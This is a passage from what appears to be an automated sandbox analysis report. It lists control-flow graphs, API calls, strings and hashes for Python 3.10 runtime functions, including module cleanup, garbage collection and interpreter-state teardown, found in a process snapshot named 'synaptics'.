6c589e71-6c589e81 PyType_IsSubtype 58->72 73 6c589f54-6c589f61 _PyErr_WriteUnraisableMsg 59->73 60->45 60->73 61->63 62->65 63->64 75 6c589cd7-6c589ce0 63->75 64->26 69 6c589ce7-6c589cea 64->69 66 6c589dd6 65->66 67 6c589d86-6c589d8c 65->67 66->41 67->66 78 6c589d8e-6c589d95 67->78 69->26 79 6c589cec-6c589cf5 69->79 76 6c589ef8-6c589f0a 71->76 77 6c589ed5-6c589eda 71->77 81 6c589e83-6c589e93 PyType_IsSubtype 72->81 82 6c589ef4 72->82 73->45 75->64 76->49 76->58 77->82 84 6c589edc-6c589ee6 77->84 86 6c589db5-6c589dba 78->86 87 6c589d97-6c589da5 78->87 79->26 80->1 88 6c589eca 81->88 89 6c589e95-6c589ebd PyUnicode_FromString call 6c565530 81->89 82->76 84->82 90 6c589ee8-6c589eeb 84->90 92 6c589dbc-6c589dc2 _PyModule_ClearDict 86->92 93 6c589dc5-6c589dc8 86->93 87->86 91 6c589da7-6c589db2 PySys_FormatStderr 87->91 88->71 89->82 99 6c589ebf-6c589ec2 89->99 96 6c589eec-6c589ef1 90->96 91->86 92->93 93->66 97 6c589dca-6c589dd3 93->97 96->82 97->66 99->82 102 6c589ec4-6c589ec8 99->102 102->96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C589510: PySys_WriteStderr.PYTHON310(# clear builtins._,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C589532
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyUnicode_FromString.PYTHON310(6C706624,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C589545
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyUnicode_InternInPlace.PYTHON310(?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C589558
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyDict_SetItem.PYTHON310(?,?,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C589567
                                                                                                                                                                                                        • Part of subcall function 6C589510: _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C58958A
                                                                                                                                                                                                        • Part of subcall function 6C589510: PySys_WriteStderr.PYTHON310(# clear sys.%s,6C6DC700,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C5895AB
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyUnicode_FromString.PYTHON310(6C6DC700,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C5895BE
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyUnicode_InternInPlace.PYTHON310(?,?,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C5895D1
                                                                                                                                                                                                        • Part of subcall function 6C589510: PyDict_SetItem.PYTHON310(?,?,?,?,?,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C5895E0
                                                                                                                                                                                                        • Part of subcall function 6C589510: _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,?,?,?,?,6C589B18,?,?,?,6C58ADC9), ref: 6C589603
                                                                                                                                                                                                        • Part of subcall function 6C589710: PyList_New.PYTHON310(00000000,?,?,?,?,?,?,6C589B21,?,?,?,6C58ADC9), ref: 6C589725
                                                                                                                                                                                                        • Part of subcall function 6C589710: _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,?,?,?,6C589B21,?,?,?,6C58ADC9), ref: 6C589735
                                                                                                                                                                                                        • Part of subcall function 6C589710: _PyDict_Next.PYTHON310(?,00000000,?,6C589B21,00000000,?), ref: 6C589760
                                                                                                                                                                                                        • Part of subcall function 6C589710: PyType_IsSubtype.PYTHON310(896C73AC,?,?,?,?,?,?,?), ref: 6C589783
                                                                                                                                                                                                        • Part of subcall function 6C589710: PySys_FormatStderr.PYTHON310(# cleanup[2] removing %U,?,?,?,?,?,?,?), ref: 6C5897AC
                                                                                                                                                                                                        • Part of subcall function 6C589710: PyWeakref_NewRef.PYTHON310(6C589B21,00000000,?,?,?,?,?,?), ref: 6C5897BF
                                                                                                                                                                                                        • Part of subcall function 6C589710: PyTuple_Pack.PYTHON310(00000002,?,00000000,?,?,?,?,?,?,?,?), ref: 6C5897D5
                                                                                                                                                                                                      • PyDict_Clear.PYTHON310(?,?,?,?,6C58ADC9), ref: 6C589B2F
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E074,?,?,?,6C58ADC9), ref: 6C589B42
                                                                                                                                                                                                      • PyObject_VectorcallMethod.PYTHON310(00000000,?,80000001,00000000,?,6C58ADC9), ref: 6C589B5B
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,6C58ADC9), ref: 6C589B6B
                                                                                                                                                                                                      • PyDict_Copy.PYTHON310(?,?,?,?,6C58ADC9), ref: 6C589B80
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,?,?,?,6C58ADC9), ref: 6C589B90
                                                                                                                                                                                                      • PyDict_Clear.PYTHON310(?,?,?,?,?,6C58ADC9), ref: 6C589B9E
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,?,6C58ADC9), ref: 6C589BC5
                                                                                                                                                                                                      • PyErr_WarnExplicitFormat.PYTHON310(6C6EE02C,00000000,6C6EE02C,00000000,gc: %zd uncollectable objects at shutdown; use gc.set_debug(gc.DEBUG_UNCOLLECTABLE) to list them,?), ref: 6C589C65
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589C75
                                                                                                                                                                                                      • PyObject_Repr.PYTHON310(?), ref: 6C589C8E
                                                                                                                                                                                                      • PyUnicode_EncodeFSDefault.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589C9D
                                                                                                                                                                                                      • PySys_WriteStderr.PYTHON310( %s,00000010), ref: 6C589CB4
                                                                                                                                                                                                        • Part of subcall function 6C5BC140: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C5AFBC4,?,?,6C5AFBC4,6C6E7728), ref: 6C5BC14C
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,?), ref: 6C589CC6
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(6C73AC60,?), ref: 6C589D48
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\moduleobject.c,000001D4,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589D6F
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(# cleanup[3] wiping %U,?), ref: 6C589DAD
                                                                                                                                                                                                      • _PyModule_ClearDict.PYTHON310(?), ref: 6C589DBD
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(# cleanup[3] wiping sys), ref: 6C589E00
                                                                                                                                                                                                      • _PyModule_ClearDict.PYTHON310(?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589E0E
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(# cleanup[3] wiping builtins,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589E1B
                                                                                                                                                                                                      • _PyModule_ClearDict.PYTHON310(?), ref: 6C589E28
                                                                                                                                                                                                        • Part of subcall function 6C4A0D50: _PyDict_Next.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4A0D44,?), ref: 6C4A0D8B
                                                                                                                                                                                                      • _PyModule_ClearDict.PYTHON310(?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589E36
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(6C73AC60,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589E77
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(6C73AC60,?,?,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589E89
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(bad argument type for built-in operation,?,?,?,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589EA6
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000), ref: 6C589EB3
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000002E2,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589F37
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,?,?,6C58ADC9), ref: 6C589F5C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s, xrefs: 6C589CAF
                                                                                                                                                                                                      • D:\a\1\s\Objects\moduleobject.c, xrefs: 6C589D5E
                                                                                                                                                                                                      • # cleanup[3] wiping builtins, xrefs: 6C589E16
                                                                                                                                                                                                      • # cleanup[3] wiping sys, xrefs: 6C589DFB
                                                                                                                                                                                                      • gc: %zd uncollectable objects at shutdown; use gc.set_debug(gc.DEBUG_UNCOLLECTABLE) to list them, xrefs: 6C589C43, 6C589C50
                                                                                                                                                                                                      • # cleanup[3] wiping %U, xrefs: 6C589DA8
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C589D63, 6C589F2B
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C589EA1
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C589F26
                                                                                                                                                                                                      • gc: %zd uncollectable objects at shutdown, xrefs: 6C589C48
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Write$Unraisable$ClearDict_FormatStderrSys_Unicode_$DictFromModule_SubtypeType_$String$InternItemNextObject_Place$CopyDefaultEncodeExplicitList_MethodObjectPackReprTuple_VectorcallWarnWeakref___acrt_iob_func
                                                                                                                                                                                                      • String ID: %s$# cleanup[3] wiping %U$# cleanup[3] wiping builtins$# cleanup[3] wiping sys$%s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c$D:\a\1\s\Objects\moduleobject.c$bad argument type for built-in operation$gc: %zd uncollectable objects at shutdown$gc: %zd uncollectable objects at shutdown; use gc.set_debug(gc.DEBUG_UNCOLLECTABLE) to list them
                                                                                                                                                                                                      • API String ID: 2428122825-4261621320
                                                                                                                                                                                                      • Opcode ID: 1d295eb785276e33cfa48145636598444e66f63fd2b4ebb53975f1b1a48a32e4
                                                                                                                                                                                                      • Instruction ID: 57b70d502c8580391243b0e538cace39a1dc634ff2b7381c8f0fcba0521d6fad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d295eb785276e33cfa48145636598444e66f63fd2b4ebb53975f1b1a48a32e4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D105B1A063119BD700DF64DC81F8AB3A0BF50319F144628E8295BB92E731FD55CBE2
                                                                                                                                                                                                      Function 6C3EB5F0 Relevance: 41.0, APIs: 12, Strings: 11, Instructions: 703timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000064, %zd,00000000,?,?), ref: 6C3EB696
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(gc: objects in each generation:%sgc: objects in permanent generation: %zd,?,00000000,?,?), ref: 6C3EB6D5
                                                                                                                                                                                                      • _PyTime_GetMonotonicClock.PYTHON310(?,?,?,?,?), ref: 6C3EB6DD
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(gc: %s <%s %p>,collectable,?,?), ref: 6C3EB95C
                                                                                                                                                                                                      • PySys_FormatStderr.PYTHON310(gc: %s <%s %p>,uncollectable,?,?,?,?), ref: 6C3EBB62
                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C3EBB85
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3EBBDA
                                                                                                                                                                                                      • PySys_WriteStderr.PYTHON310(gc: collecting generation %d...,00000002), ref: 6C3EB656
                                                                                                                                                                                                        • Part of subcall function 6C5BC140: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C5AFBC4,?,?,6C5AFBC4,6C6E7728), ref: 6C5BC14C
                                                                                                                                                                                                      • _PyTuple_MaybeUntrack.PYTHON310(00000164), ref: 6C3EB7E2
                                                                                                                                                                                                      • PySys_WriteStderr.PYTHON310(gc: done, %zd unreachable, %zd uncollectable, %.4fs elapsed,?,?,?,?,3B9ACA00,00000000), ref: 6C3EBC59
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,00000150,?,?), ref: 6C3EBCEE
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(in garbage collection,00000000), ref: 6C3EBE7D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • gc: %s <%s %p>, xrefs: 6C3EB957, 6C3EBB5D
                                                                                                                                                                                                      • gc: objects in each generation:%sgc: objects in permanent generation: %zd, xrefs: 6C3EB6D0
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C3EBCE2
                                                                                                                                                                                                      • gc: done, %zd unreachable, %zd uncollectable, %.4fs elapsed, xrefs: 6C3EBC54
                                                                                                                                                                                                      • gc: collecting generation %d..., xrefs: 6C3EB651
                                                                                                                                                                                                      • @xJl, xrefs: 6C3EBDCE
                                                                                                                                                                                                      • %zd, xrefs: 6C3EB686
                                                                                                                                                                                                      • in garbage collection, xrefs: 6C3EBE78
                                                                                                                                                                                                      • uncollectable, xrefs: 6C3EBB58
                                                                                                                                                                                                      • collectable, xrefs: 6C3EB952
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C3EBCDD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StderrSys_$Format$Write$Err_$ClockCount64MaybeMonotonicS_snprintfTickTime_Tuple_Unothrow_t@std@@@UnraisableUntrack__acrt_iob_func__ehfuncinfo$??2@
                                                                                                                                                                                                      • String ID: %zd$%s:%d: bad argument to internal function$@xJl$D:\a\1\s\Objects\listobject.c$collectable$gc: %s <%s %p>$gc: collecting generation %d...$gc: done, %zd unreachable, %zd uncollectable, %.4fs elapsed$gc: objects in each generation:%sgc: objects in permanent generation: %zd$in garbage collection$uncollectable
                                                                                                                                                                                                      • API String ID: 2853807899-1200274518
                                                                                                                                                                                                      • Opcode ID: e670594030e5675c9e83bb84d6f3b6f274bd9683172587f9981ec6498f4e45cb
                                                                                                                                                                                                      • Instruction ID: 8e2bc66071083e52f63d5dfe016ef79220eec525fc77a9239d374d86af5deed4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e670594030e5675c9e83bb84d6f3b6f274bd9683172587f9981ec6498f4e45cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D526A716057118FC715CF28C880A9AF7F5BF89318F148A6EE9A98B760E771E844CF85
                                                                                                                                                                                                      Function 6C58E7F0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 191threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,?,?,?,6C58ACC9,00000000), ref: 6C58E83B
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(04C483FF,?,?,6C58ACC9,00000000), ref: 6C58E842
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(?,000000FF,000000FF,00000000,00000000,00000000,?,?,?,6C58ACC9,00000000), ref: 6C58E878
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C58ACC9,00000000), ref: 6C58E8D0
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,6C58ACC9,00000000), ref: 6C58E8EF
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,6C58ACC9,00000000), ref: 6C58E8F6
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,6C58ACC9,00000000), ref: 6C58E906
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(50082444,?,?,6C58ACC9,00000000), ref: 6C58E90D
                                                                                                                                                                                                        • Part of subcall function 6C58F440: PyThread_acquire_lock_timed.PYTHON310(?,000000FF,000000FF,00000000,?,?,?,?,6C58ACC0,00000000), ref: 6C58F477
                                                                                                                                                                                                        • Part of subcall function 6C58F440: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4A7
                                                                                                                                                                                                        • Part of subcall function 6C58F440: ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4C6
                                                                                                                                                                                                        • Part of subcall function 6C58F440: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4CD
                                                                                                                                                                                                        • Part of subcall function 6C58F440: GetLastError.KERNEL32 ref: 6C58F4D9
                                                                                                                                                                                                        • Part of subcall function 6C58F440: TlsGetValue.KERNEL32(?), ref: 6C58F4E8
                                                                                                                                                                                                        • Part of subcall function 6C58F440: SetLastError.KERNEL32(00000000), ref: 6C58F4F1
                                                                                                                                                                                                        • Part of subcall function 6C58F440: TlsSetValue.KERNEL32(?,00000000), ref: 6C58F504
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyInterpreterState_Delete,NULL interpreter,?,?,6C58ACC9,00000000), ref: 6C58E944
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyInterpreterState_Delete,remaining threads,PyInterpreterState_Delete,NULL interpreter,?,?,6C58ACC9,00000000), ref: 6C58E953
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyInterpreterState_Delete,remaining subinterpreters,PyInterpreterState_Delete,remaining threads,PyInterpreterState_Delete,NULL interpreter,?,?,6C58ACC9,00000000), ref: 6C58E962
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyInterpreterState_Get,PyInterpreterState_Delete,remaining subinterpreters,PyInterpreterState_Delete,remaining threads,PyInterpreterState_Delete,NULL interpreter,?,?,6C58ACC9,00000000), ref: 6C58E986
                                                                                                                                                                                                        • Part of subcall function 6C548FE0: _Py_FatalErrorFunc.PYTHON310(?,the function must be called with the GIL held, but the GIL is released (the current Python thread state is NULL),?,6C41B312,_PyOS_InterruptOccurred), ref: 6C548FEB
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyInterpreterState_Get,no current interpreter,PyInterpreterState_Get,PyInterpreterState_Delete,remaining subinterpreters,PyInterpreterState_Delete,remaining threads,PyInterpreterState_Delete,NULL interpreter,?,?,6C58ACC9,00000000), ref: 6C58E995
                                                                                                                                                                                                        • Part of subcall function 6C58C540: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,000000FF,?,6C566224,_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet,?,6C3ECF57,?), ref: 6C58C550
                                                                                                                                                                                                        • Part of subcall function 6C58C540: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,6C566224,_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet,?,6C3ECF57,?), ref: 6C58C557
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,?,?,?,04C483FF,6C58ACC9,5E5FE445,?,?,PyInterpreterState_Get,no current interpreter,PyInterpreterState_Get,PyInterpreterState_Delete,remaining subinterpreters), ref: 6C58E9D4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error$CriticalFatalSection$Func$CloseDeleteEnterHandleLastLeaveReleaseSemaphoreThread_acquire_lock_timedValue$Err_Error_ObjectTstate__acrt_iob_func_fileno
                                                                                                                                                                                                      • String ID: @bJl$NULL interpreter$PyInterpreterState_Delete$PyInterpreterState_Get$no current interpreter$no interpreter provided$remaining subinterpreters$remaining threads
                                                                                                                                                                                                      • API String ID: 842579591-2141007785
                                                                                                                                                                                                      • Opcode ID: 09cdf670d2baaeea23ead015de7308f94407daf9a0fc76c6423a395b8dc19f17
                                                                                                                                                                                                      • Instruction ID: 5f891920bfe607f9148ed9f435c5926b236e6554285b00c983006a4383ba08af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09cdf670d2baaeea23ead015de7308f94407daf9a0fc76c6423a395b8dc19f17
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4512335301510ABCB00AF19DC44F5A7BB4EFC6729B248368E91887A91EB70F854CBE5
                                                                                                                                                                                                      Function 6C4BD550 Relevance: 37.1, APIs: 14, Strings: 7, Instructions: 322COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 323 6c4bd550-6c4bd562 324 6c4bd581-6c4bd588 323->324 325 6c4bd564-6c4bd574 PyErr_Format 323->325 327 6c4bd58a-6c4bd5a1 call 6c4725a0 324->327 328 6c4bd5a9-6c4bd5b1 324->328 326 6c4bd577-6c4bd580 325->326 327->326 338 6c4bd5a3 327->338 330 6c4bd5d9-6c4bd5e0 328->330 331 6c4bd5b3-6c4bd5b9 328->331 332 6c4bd5ef-6c4bd5f3 330->332 333 6c4bd5e2-6c4bd5ed PyType_Ready 330->333 331->332 335 6c4bd5bb-6c4bd5c7 331->335 336 6c4bd5ff-6c4bd606 332->336 337 6c4bd5f5-6c4bd5f7 332->337 333->326 333->332 339 6c4bd5c9 335->339 340 6c4bd5cf 335->340 342 6c4bd608-6c4bd610 336->342 343 6c4bd63d-6c4bd648 call 6c4b7d60 336->343 337->336 341 6c4bd5f9-6c4bd5fc 337->341 338->328 339->340 340->330 341->336 344 6c4bd612-6c4bd622 342->344 345 6c4bd624-6c4bd62c PyTuple_Pack 342->345 343->326 350 6c4bd64e-6c4bd65d 343->350 347 6c4bd62f-6c4bd631 344->347 345->347 347->326 349 6c4bd637 347->349 349->343 351 6c4bd698-6c4bd6a6 350->351 352 6c4bd65f-6c4bd66c 350->352 353 6c4bd6a8-6c4bd6ad 351->353 354 6c4bd6bc-6c4bd6c0 351->354 355 6c4bd66e 352->355 356 6c4bd691-6c4bd695 352->356 353->354 358 6c4bd6af-6c4bd6b1 353->358 359 6c4bd796 354->359 360 6c4bd6c6-6c4bd6c8 354->360 357 6c4bd671-6c4bd67a 355->357 356->351 361 6c4bd689-6c4bd68f 357->361 362 6c4bd67c-6c4bd683 357->362 358->354 363 6c4bd6b3-6c4bd6b9 358->363 366 6c4bd7a0-6c4bd7a2 call 6c4bd2a0 359->366 364 6c4bd788-6c4bd794 360->364 365 6c4bd6ce-6c4bd6e3 call 6c4d2b80 360->365 361->356 361->357 362->361 367 6c4bd739-6c4bd75b PyErr_Format 362->367 363->354 364->366 365->326 373 6c4bd6e9-6c4bd6f5 PyDict_Contains 365->373 370 6c4bd7a7-6c4bd7a9 366->370 370->326 372 6c4bd7af-6c4bd7bb 370->372 374 6c4bd7bd-6c4bd7c1 call 6c4bc2c0 372->374 375 6c4bd7c6-6c4bd7dc 372->375 373->366 376 6c4bd6fb 373->376 374->375 378 6c4bd82a-6c4bd82c 375->378 379 6c4bd7de-6c4bd7e1 375->379 376->326 380 6c4bd701-6c4bd717 PyCMethod_New 376->380 383 6c4bd86a-6c4bd877 378->383 384 6c4bd82e-6c4bd832 378->384 382 6c4bd7e5-6c4bd7ee 379->382 380->326 381 6c4bd71d-6c4bd732 call 6c4d2b80 380->381 401 6c4bd75c-6c4bd767 PyDict_SetItem 381->401 402 6c4bd734-6c4bd737 381->402 388 6c4bd7f0-6c4bd7fb call 6c4bc430 382->388 389 6c4bd814-6c4bd824 382->389 390 6c4bd8aa-6c4bd8ae 383->390 391 6c4bd879-6c4bd881 383->391 385 6c4bd83a-6c4bd83e 384->385 386 6c4bd834-6c4bd837 384->386 392 6c4bd840-6c4bd843 385->392 393 6c4bd846-6c4bd84a 385->393 386->385 388->326 413 6c4bd801-6c4bd807 388->413 389->382 398 6c4bd826 389->398 399 6c4bd918-6c4bd929 390->399 400 6c4bd8b0-6c4bd8c5 call 6c4d2b80 